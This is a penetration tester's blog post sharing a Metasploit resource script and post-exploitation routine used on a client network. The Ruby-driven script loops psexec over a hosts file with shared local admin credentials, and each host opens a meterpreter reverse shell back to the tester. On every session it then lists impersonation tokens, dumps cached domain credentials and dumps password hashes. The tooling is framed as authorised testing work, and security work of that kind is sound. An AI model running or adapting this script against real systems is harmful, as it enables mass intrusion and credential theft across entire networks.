On a pentest with a massive internal network, we managed to
get access to 22k machines as local admin using a local account (verified with ncrack).
Obvious domain priv esc routes were shut down, so it was time to extend our control and information. I wanted hashes, cached domain creds and available tokens from
each of these. So I put together the following metasploit massploitation
script. The main difference between this and the other solutions posted, is that my box fell over with several thousand meterpreter sessions open, so I wanted a way to automate connecting & pulling the info without needed all the sessions to be open at once.
In light of past and recent posts from mubix (one, two) and jcran, I thought I'd post the hack I used to connect to then run Metasploit post-exploitation modules across several thousand machines. I still need to go through them all and merge them, but I thought I'd throw my hat in the ring. Thank to mubix for his help on the job with some of it.
Essentially, there are three parts:
- The massploitation.rc, this is the script run in the console (capturing the output is a good idea)
- The targets file which has a list of targets, one per line
- The extract.rc that is run within each meterpreter session by the massploitation script. You can change this to what you need.
use multi/handler
setg PAYLOAD windows/meterpreter/reverse_tcp
setg LHOST <Local IP>
set LPORT 4444
set ExitOnSession false
exploit -j -z
use exploit/windows/smb/psexec
set SMBUser <username>
set SMBPass <pass or hash>
set SMBDomain "."
set DisablePayloadHandler true
<ruby>
hostsfile = "<file containing hosts one per line>"
File.open(hostsfile).each do |host|
host.strip!
print_status("Targetting #{host}")
self.run_single("set RHOST #{host}")
self.run_single("exploit -j -z")
flag = false
count = 0
while ( flag == false and count < 5 )
if ( framework.sessions.length > 0 )
self.run_single("sessions -s extract.rc")
flag = true
#self.run_single("sessions -K") #trying to resolve the race condition, this didn't work
else
count += 1
end
sleep(5)
end
end
</ruby>
extract.rc
print_status(client.sys.config.sysinfo["Computer"])
print_status(client.sys.config.sysinfo["OS"])
client.console.run_single("load incognito")
client.console.run_single("list_tokens -u")
client.console.run_single("run post/windows/gather/cachedump")
client.console.run_single("hashdump")
client.console.run_single("exit") #Rather kill the session here
The stuff isn’t perfect, as there is a race condition where sometimes it tries to execute the meterpreter script before the meterpreter session is ready. Other than the delay, I’ll need to spend some time to understand metasploit’s threading.
Trackbacks
Trackback specific URI for this entry
No Trackbacks